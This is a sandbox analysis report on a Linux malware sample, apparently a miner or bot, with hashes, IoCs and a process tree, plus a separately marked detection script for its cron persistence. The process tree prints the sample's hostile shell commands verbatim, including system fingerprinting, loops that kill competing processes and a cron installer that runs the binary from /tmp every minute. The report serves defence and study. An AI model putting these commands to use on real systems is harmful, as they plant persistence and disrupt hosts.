Overview
- score: 10

Static
- score: 5

Behavioral task scores (sample, platform, score)
  .systemd/.i686     ubuntu-22.04-amd64   3
  .systemd/.run      ubuntu-18.04-amd64   7
  .systemd/.run      debian-9-armhf       6
  .systemd/.run      debian-9-mips        6
  .systemd/.run      debian-9-mipsel      6
  .systemd/.x86_64   ubuntu-24.04-amd64   10
  .systemd/auto      ubuntu-18.04-amd64   7
  .systemd/auto      debian-9-armhf       7
  .systemd/auto      debian-9-mips        7
  .systemd/auto      debian-9-mipsel      7
  .systemd/clean     ubuntu-18.04-amd64   1
  .systemd/clean     debian-9-armhf       1
  .systemd/clean     debian-9-mips        1
  .systemd/clean     debian-9-mipsel      1
  .systemd/go        ubuntu-18.04-amd64   1
  .systemd/go        debian-9-armhf       1
  .systemd/go        debian-9-mips        1
  .systemd/go        debian-9-mipsel      1
  .systemd/ntpdate   ubuntu-18.04-amd64   7
  .systemd/ntpdate   debian-9-armhf       7
  .systemd/ntpdate   debian-9-mips        7
  .systemd/ntpdate   debian-9-mipsel      7
  .update/.i686      ubuntu-20.04-amd64   6
  .update/.run       ubuntu-18.04-amd64   3
  .update/.run       debian-9-armhf       3
  .update/.run       debian-9-mips        3
  .update/.run       debian-9-mipsel      3
  .update/.x86_64    ubuntu-22.04-amd64   10
  .update/auth       ubuntu-18.04-amd64   8
  .update/auth       debian-9-armhf       8
  .update/auth       debian-9-mips        8
  .update/auth       debian-9-mipsel      8

Analysis
- max time kernel: 149s
- max time network: 134s
- platform: ubuntu-20.04_amd64
- resource: ubuntu2004-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu2004-amd64-20240611-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
- submitted: 08-11-2024 11:36
Behavioral tasks (task, sample, resource)
  behavioral1    .systemd/.i686     ubuntu2204-amd64-20240611-en
  behavioral2    .systemd/.run      ubuntu1804-amd64-20240508-en
  behavioral3    .systemd/.run      debian9-armhf-20240611-en
  behavioral4    .systemd/.run      debian9-mipsbe-20240729-en
  behavioral5    .systemd/.run      debian9-mipsel-20240611-en
  behavioral6    .systemd/.x86_64   ubuntu2404-amd64-20240523-en
  behavioral7    .systemd/auto      ubuntu1804-amd64-20240508-en
  behavioral8    .systemd/auto      debian9-armhf-20240611-en
  behavioral9    .systemd/auto      debian9-mipsbe-20240729-en
  behavioral10   .systemd/auto      debian9-mipsel-20240611-en
  behavioral11   .systemd/clean     ubuntu1804-amd64-20240611-en
  behavioral12   .systemd/clean     debian9-armhf-20240418-en
  behavioral13   .systemd/clean     debian9-mipsbe-20240611-en
  behavioral14   .systemd/clean     debian9-mipsel-20240611-en
  behavioral15   .systemd/go        ubuntu1804-amd64-20240729-en
  behavioral16   .systemd/go        debian9-armhf-20240611-en
  behavioral17   .systemd/go        debian9-mipsbe-20240729-en
  behavioral18   .systemd/go        debian9-mipsel-20240418-en
  behavioral19   .systemd/ntpdate   ubuntu1804-amd64-20240611-en
  behavioral20   .systemd/ntpdate   debian9-armhf-20240611-en
  behavioral21   .systemd/ntpdate   debian9-mipsbe-20240611-en
  behavioral22   .systemd/ntpdate   debian9-mipsel-20240418-en
  behavioral23   .update/.i686      ubuntu2004-amd64-20240611-en
  behavioral24   .update/.run       ubuntu1804-amd64-20240611-en
  behavioral25   .update/.run       debian9-armhf-20240729-en
  behavioral26   .update/.run       debian9-mipsbe-20240729-en
  behavioral27   .update/.run       debian9-mipsel-20240611-en
  behavioral28   .update/.x86_64    ubuntu2204-amd64-20240611-en
  behavioral29   .update/auth       ubuntu1804-amd64-20240508-en
  behavioral30   .update/auth       debian9-armhf-20240611-en
  behavioral31   .update/auth       debian9-mipsbe-20240611-en
  behavioral32   .update/auth       debian9-mipsel-20240729-en
General
- Target: .update/.i686
- Size: 1.4MB
- MD5: 0418fda2bb712a2a2dfe38bbbd9e6390
- SHA1: 3a7db599e916e40ae844e4998b665bad5307154d
- SHA256: 05bfc9c56ad09d2b15a43f7887087d4f601016c0d81a822f42fc23ca70fbbf33
- SHA512: d40c63ec0d5e60db266c9223a02d5b2d97787cca481c9f56beddcd3ffe3022badd8ff6e4fa25a73d56be06f99cc6555031af185f88017a74bcd050ac5be33401
- SSDEEP: 24576:bZ9yQjOF5thg8/LRLgP+kMzdroSXcRb+34YlCB0V4XLNw3QgRHpV8RDHkSrWgfqH:lNC5tOcRL4M4Rbo4YibwggRM1rCjPF
Malware Config

Signatures

- Checks hardware identifiers (DMI)  (1 TTPs, 4 IoCs)
  Checks DMI information that indicates whether the system is a virtual machine.
  File opened for reading, process .i686:
    /sys/devices/virtual/dmi/id/product_name
    /sys/devices/virtual/dmi/id/board_vendor
    /sys/devices/virtual/dmi/id/bios_vendor
    /sys/devices/virtual/dmi/id/sys_vendor

- Creates/modifies Cron job  (1 TTPs, 1 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  File opened for modification, process crontab:
    /var/spool/cron/crontabs/tmp.6m5OSD

- Enumerates running processes
  Discovers information about currently running processes on the system.

- Reads hardware information  (1 TTPs, 14 IoCs)
  Accesses system info like serial numbers, manufacturer names etc.
  File opened for reading, process .i686:
    /sys/devices/virtual/dmi/id/board_name
    /sys/devices/virtual/dmi/id/board_version
    /sys/devices/virtual/dmi/id/board_asset_tag
    /sys/devices/virtual/dmi/id/chassis_asset_tag
    /sys/devices/virtual/dmi/id/product_serial
    /sys/devices/virtual/dmi/id/product_uuid
    /sys/devices/virtual/dmi/id/chassis_type
    /sys/devices/virtual/dmi/id/chassis_version
    /sys/devices/virtual/dmi/id/bios_date
    /sys/devices/virtual/dmi/id/product_version
    /sys/devices/virtual/dmi/id/board_serial
    /sys/devices/virtual/dmi/id/chassis_vendor
    /sys/devices/virtual/dmi/id/bios_version
    /sys/devices/virtual/dmi/id/chassis_serial

- Security Software Discovery  (1 TTPs, 2 IoCs)
  Adversaries may attempt to discover installed security software and its configurations.
  pid / process:
    1440  sh
    1463  sh

- Checks CPU configuration  (1 TTPs, 3 IoCs)
  Checks CPU information that indicates whether the system is a virtual machine.
  File opened for reading (ioc, process):
    /proc/cpuinfo   grep
    /proc/cpuinfo   grep
    /proc/cpuinfo   .i686

- Reads CPU attributes  (1 TTPs, 7 IoCs)
  File opened for reading (ioc, process):
    /sys/devices/system/cpu/online     ps
    /sys/devices/system/cpu/online     ps
    /sys/devices/system/cpu/online     ps
    /sys/devices/system/cpu/online     .i686
    /sys/devices/system/cpu/types      .i686
    /sys/devices/system/cpu/possible   .i686
    /sys/devices/system/cpu/online     ps

- Enumerates kernel/hardware configuration  (1 TTPs, 60 IoCs)
  Reads contents of /sys virtual filesystem to enumerate system information.
  File opened for reading, process .i686:
    /sys/bus/cpu/devices/cpu0/cache/index0/level
    /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets
    /sys/bus/dax/devices/target_node
    /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map
    /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map
    /sys/bus/node/devices/node0/meminfo
    /sys/bus/cpu/devices/cpu0/cache/index3/type
    /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map
    /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map
    /sys/devices/system/node/online
    /sys/bus/cpu/devices/cpu0/cache/index3/size
    /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map
    /sys/firmware/dmi/tables/DMI
    /sys/bus/node/devices/node0/access0/initiators
    /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages
    /sys/bus/cpu/devices/cpu0/cache/index0/type
    /sys/bus/cpu/devices/cpu0/cache/index2/level
    /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map
    /sys/kernel/mm/hugepages
    /sys/bus/node/devices/node0/cpumap
    /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size
    /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map
    /sys/bus/dax/target_node
    /sys/bus/cpu/devices
    /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size
    /sys/bus/cpu/devices/cpu0/cache/index2/size
    /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size
    /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition
    /sys/bus/cpu/devices/cpu0/cache/index1/level
    /sys/bus/cpu/devices/cpu0/cache/index1/type
    /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets
    /sys/firmware/dmi/tables/smbios_entry_point
    /sys/fs/cgroup/unified/cgroup.controllers
    /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets
    /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
    /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map
    /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition
    /sys/fs/cgroup/cpuset/cpuset.mems
    /sys/bus/cpu/devices/cpu0/topology/physical_package_id
    /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency
    /sys/bus/cpu/devices/cpu0/cache/index0/size
    /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition
    /sys/fs/cgroup/cpuset/cpuset.cpus
    /sys/bus/cpu/devices/cpu0/topology/die_cpus
    /sys/bus/cpu/devices/cpu0/cache/index2/type
    /sys/bus/cpu/devices/cpu0/cache/index3/level
    /sys/bus/node/devices/node0/hugepages
    /sys/bus/node/devices/node0/access0/initiators/read_latency
    /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map
    /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
    /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages
    /sys/bus/cpu/devices/cpu0/topology/core_cpus
    /sys/bus/cpu/devices/cpu0/topology/core_id
    /sys/bus/cpu/devices/cpu0/topology/package_cpus
    /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq
    /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map
    /sys/bus/dax/devices
    /sys/bus/node/devices/node0/access1/initiators
    /sys/bus/node/devices/node0/access0/initiators/read_bandwidth
    /sys/devices/virtual/dmi/id

- Process Discovery  (1 TTPs, 2 IoCs)
  Adversaries may try to discover information about running processes.
  pid / process:
    1466  ps
    1442  ps

- Reads runtime system information (heading not preserved in this extract; the name is the tag the Processes section attaches to the ps children that generate these reads)
  File opened for reading, process ps:
    /proc/565/stat
    /proc/787/cmdline
    /proc/15/status
    /proc/455/stat
    /proc/85/status
    /proc/89/stat
    /proc/495/stat
    /proc/444/stat
    /proc/962/status
    /proc/1342/status
    /proc/87/status
    /proc/175/stat
    /proc/3/stat
    /proc/1349/status
    /proc/443/cmdline
    /proc/20/cmdline
    /proc/558/stat
    /proc/1349/cmdline
    /proc/3/stat
    /proc/1328/cmdline
    /proc/79/status
    /proc/169/status
    /proc/1068/status
    /proc/87/status
    /proc/23/stat
    /proc/91/cmdline
    /proc/1068/stat
    /proc/1333/stat
    /proc/164/status
    /proc/457/status
    /proc/1039/status
    /proc/1397/stat
    /proc/7/status
    /proc/1398/stat
    /proc/868/stat
    /proc/500/status
    /proc/558/stat
    /proc/1138/status
    /proc/169/stat
    /proc/693/status
    /proc/876/status
    /proc/91/stat
    /proc/1097/stat
    /proc/90/cmdline
    /proc/813/stat
    /proc/159/cmdline
    /proc/1465/cmdline
    /proc/159/stat
    /proc/444/stat
    /proc/962/cmdline
    /proc/159/stat
    /proc/676/status
    /proc/20/stat
    /proc/86/status
    /proc/681/status
    /proc/171/stat
    /proc/272/status
    /proc/77/cmdline
    /proc/693/cmdline
    /proc/1162/status
    /proc/22/stat
    /proc/1366/status
    /proc/1097/cmdline
    /proc/1336/cmdline

- Writes file to tmp directory  (2 IoCs)
  Malware often drops required files in the /tmp directory.
  File opened for modification (ioc, process):
    /tmp/.update/.cron   sh
    /tmp/.lock           .i686
Processes

/tmp/.update/.i686  (PID 1398)
  cmd: /tmp/.update/.i686
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Writes file to tmp directory

  /bin/sh  (PID 1399)
    cmd: sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""

    /usr/bin/hostname  (PID 1402)  cmd: hostname -I
    /usr/bin/awk       (PID 1404)  cmd: awk "{print \$1}"
    /usr/bin/awk       (PID 1409)  cmd: awk "{print \"-\"\$2}"
    /usr/bin/head      (PID 1408)  cmd: head -n 1
    /usr/bin/grep      (PID 1407)  cmd: grep "Port "
    /usr/bin/cat       (PID 1406)  cmd: cat /etc/ssh/sshd_config
    /usr/bin/whoami    (PID 1410)  cmd: whoami
    /usr/bin/hostname  (PID 1411)  cmd: hostname
    /usr/bin/grep      (PID 1412)  cmd: grep -c "^processor" /proc/cpuinfo
      - Checks CPU configuration
    /usr/bin/sed       (PID 1418)  cmd: sed -e "s/\$//"
    /usr/bin/sed       (PID 1417)  cmd: sed -e "s/^ *//"
    /usr/bin/cut       (PID 1416)  cmd: cut -d: -f2
    /usr/bin/grep      (PID 1415)  cmd: grep -m 1 "model name" /proc/cpuinfo
      - Checks CPU configuration
    /usr/bin/awk       (PID 1421)  cmd: awk "{print \$1}"
    /usr/bin/awk       (PID 1424)  cmd: awk "{print \$4}"
    /usr/bin/awk       (PID 1427)  cmd: awk "{print \$4}"

  /bin/sh  (PID 1428)
    cmd: sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"

    /usr/bin/awk   (PID 1430)  cmd: awk "/[zZ]/ && !a[\$2]++ {print \$2}"
    /usr/bin/ps    (PID 1429)  cmd: ps -A "-ostat,ppid"
      - Reads CPU attributes
      - Reads runtime system information
    /usr/bin/id    (PID 1432)  cmd: id -u
    /usr/bin/grep  (PID 1438)  cmd: grep -v grep
    /usr/bin/grep  (PID 1437)  cmd: grep /etc/cron
    /usr/bin/ps    (PID 1436)  cmd: ps x
      - Reads CPU attributes
      - Reads runtime system information

  /bin/sh  (PID 1440)
    cmd: sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    - Security Software Discovery

    /usr/bin/id    (PID 1441)  cmd: id -u
    /usr/bin/awk   (PID 1446)  cmd: awk "{if(\$3>30.0) print \$2}"
    /usr/bin/grep  (PID 1445)  cmd: grep -v /usr/sbin/httpd
    /usr/bin/grep  (PID 1444)  cmd: grep -v -- "-bash[[:space:]]*\$"
    /usr/bin/grep  (PID 1443)  cmd: grep -v grep
    /usr/bin/ps    (PID 1442)  cmd: ps aux
      - Reads CPU attributes
      - Process Discovery
      - Reads runtime system information

  /bin/sh  (PID 1448)
    cmd: sh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.update/.i686' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/.update/.i686' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.update/.i686\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"
    - Writes file to tmp directory

    /usr/bin/rm       (PID 1450)  cmd: rm -rf /tmp/.update/.cron
    /usr/bin/grep     (PID 1452)  cmd: grep -v grep
    /usr/bin/crontab  (PID 1451)  cmd: crontab -l
    /usr/bin/grep     (PID 1453)  cmd: grep -v /tmp/.update/.i686
    /usr/bin/grep     (PID 1457)  cmd: grep "/tmp/.update/.i686\$"
    /usr/bin/grep     (PID 1456)  cmd: grep -v grep
    /usr/bin/uniq     (PID 1459)  cmd: uniq
    /usr/bin/crontab  (PID 1455)  cmd: crontab -l
    /usr/bin/wc       (PID 1460)  cmd: wc -l
    /usr/bin/sort     (PID 1458)  cmd: sort
    /usr/bin/crontab  (PID 1461)  cmd: crontab /tmp/.update/.cron
      - Creates/modifies Cron job
    /usr/bin/rm       (PID 1462)  cmd: rm -rf /tmp/.update/.cron

  /bin/sh  (PID 1463)
    cmd: sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
    - Security Software Discovery

    /usr/bin/id    (PID 1464)  cmd: id -u
    /usr/bin/wc    (PID 1470)  cmd: wc -l
    /usr/bin/awk   (PID 1469)  cmd: awk "{if(\$3>30.0) print \$2}"
    /usr/bin/grep  (PID 1468)  cmd: grep -- "-bash[[:space:]]*\$"
    /usr/bin/grep  (PID 1467)  cmd: grep -v grep
    /usr/bin/ps    (PID 1466)  cmd: ps aux
      - Reads CPU attributes
      - Process Discovery
      - Reads runtime system information
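The process tree above gives a concrete persistence signature: the installer at PID 1448 runs with dir=/tmp/.update (its child rm targets /tmp/.update/.cron), so the line it appends and installs with crontab is of the form "* * * * * /tmp/.update//tmp/.update/.i686", and the "Writes file to tmp directory" IoCs name /tmp/.update/.cron and /tmp/.lock. Worth noting when reading the "Security Software Discovery" tags on PIDs 1440 and 1463: the visible commands kill parents of zombie processes, kill /etc/cron-related processes when running as root, and kill any process above 30% CPU other than an idle -bash or /usr/sbin/httpd; none of them references a security product by name. The following is an added example, not part of this report and not code from the sample: a POSIX sh sweep that flags crontab entries executing from /tmp, /var/tmp, /dev/shm or a hidden dot-directory, or scheduled every minute, checks for the three dropped paths, and compares a file's SHA256 against the hash in the General section. The ROOT prefix, the constructed crontab body and the reason labels are assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the sandbox report or from the sample itself.
# It checks a host for the persistence artefacts the report lists:
#   - cron entries that execute from /tmp-style or hidden dot-directories
#     (the sample installs "* * * * * <cwd>//tmp/.update/.i686" via crontab)
#   - the dropped files /tmp/.update/.i686, /tmp/.update/.cron and /tmp/.lock
#   - the SHA256 of the analysed .update/.i686 binary
# ROOT is an assumed prefix so the file checks can be exercised on a
# constructed directory tree; on a live host use ROOT=/ (the default).

# SHA256 of .update/.i686 as given in the General section of the report.
KNOWN_SHA256=05bfc9c56ad09d2b15a43f7887087d4f601016c0d81a822f42fc23ca70fbbf33

# Drop paths taken from the "Writes file to tmp directory" and cron IoCs.
DROP_PATHS="/tmp/.update/.i686 /tmp/.update/.cron /tmp/.lock"

# Constructed crontab body used by the demo below; the third line has the
# shape the sample's installer (PID 1448) produces, the rest is benign filler.
SAMPLE_CRONTAB='# m h dom mon dow command
MAILTO=root
* * * * * /tmp/.update//tmp/.update/.i686
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /home/deploy/.cache/run.sh
*/5 * * * * /usr/local/bin/backup.sh'

# flag_cron_lines: read a crontab on stdin, print "<reasons>TAB<line>" for each
# entry whose command runs from a world-writable directory or a hidden
# dot-directory, or whose schedule is every minute. Comments, blank lines and
# VAR=value lines are skipped; @reboot-style schedules are handled.
flag_cron_lines() {
    awk '
        /^[ \t]*#/ { next }
        NF == 0    { next }
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }
        {
            if ($1 ~ /^@/) { sched = $1; start = 2 }
            else { sched = $1 " " $2 " " $3 " " $4 " " $5; start = 6 }
            cmd = ""
            for (i = start; i <= NF; i++) cmd = cmd (i > start ? " " : "") $i
            reason = ""
            if (cmd ~ /^(\/tmp|\/var\/tmp|\/dev\/shm)\//)
                reason = "world-writable dir"
            if (cmd ~ /(^|\/)\.[^\/ ]+\//)
                reason = reason (reason == "" ? "" : ",") "hidden dot-dir"
            if (sched == "* * * * *")
                reason = reason (reason == "" ? "" : ",") "every-minute"
            if (reason != "") printf "%s\t%s\n", reason, $0
        }'
}

# count_flagged TEXT: number of flagged entries in the crontab body TEXT.
count_flagged() {
    printf '%s\n' "$1" | flag_cron_lines | wc -l | tr -d ' '
}

# sweep_drop_files ROOT: print "present<TAB><path>" for each drop path found
# under ROOT. Always returns 0 so it composes under set -e.
sweep_drop_files() {
    root=${1:-}
    root=${root%/}                      # "/" and "" both mean the real root
    for p in $DROP_PATHS; do
        [ -e "$root$p" ] && printf 'present\t%s\n' "$root$p"
    done
    return 0
}

# matches_known_sample FILE: exit 0 if FILE hashes to the analysed binary.
matches_known_sample() {
    sum=$(sha256sum "$1" 2>/dev/null | awk '{print $1}')
    [ "$sum" = "$KNOWN_SHA256" ]
}

# Demo on a constructed tree: a fake root carrying two of the three drop files.
demo() {
    fake=$(mktemp -d)
    mkdir -p "$fake/tmp/.update"
    : > "$fake/tmp/.update/.i686"
    : > "$fake/tmp/.lock"
    echo "== drop files under $fake =="
    sweep_drop_files "$fake"
    echo "== flagged cron entries =="
    printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_lines
    if matches_known_sample "$fake/tmp/.update/.i686"; then
        echo "hash matches the analysed sample"
    else
        echo "hash does not match the analysed sample (expected for an empty placeholder)"
    fi
    rm -rf "$fake"
}
demo
```

On a live host run sweep_drop_files / with no prefix and feed `crontab -l` for each user (and the files under /etc/cron.d) into flag_cron_lines; the every-minute and /tmp tests are deliberately coarse, so treat a hit as a lead to confirm with the hash check and the process tree above, not as a verdict on its own.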
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 42B
  MD5: 9814e9c19a7304358742e3553bd73ea7
  SHA1: 88d43c112af907d972b1f1e2f49632f8ca004864
  SHA256: 9941b828f1984f2a85ba06f5eca0d7c22c9519cb8f09b43bf9930f6174f01b6d
  SHA512: eb8ff6cd01f8100b78b579d732ec264976bc3378130b1535bea4553a8347cf445c5654adc58fea55341d9c22ad29872d5d9f85fd8bc6291bc449359ec4e34d9f

- Filesize: 234B
  MD5: 964b07829b4f71b67d83a0ac24db1cab
  SHA1: bf052205fa7870a5b2ebb4141a4bb604ccecf435
  SHA256: af81703b357640390737fb2e4df7d99dfc26935fd0d454b53440a70c7b70333b
  SHA512: d44502a0c0908f5aeb8f5899fe7c26232e2563d1ba72a26bf32d5973513afcd5c5af321b047d62d1d36c393385a7d285d59b91869535cf9c350075408d6aea1b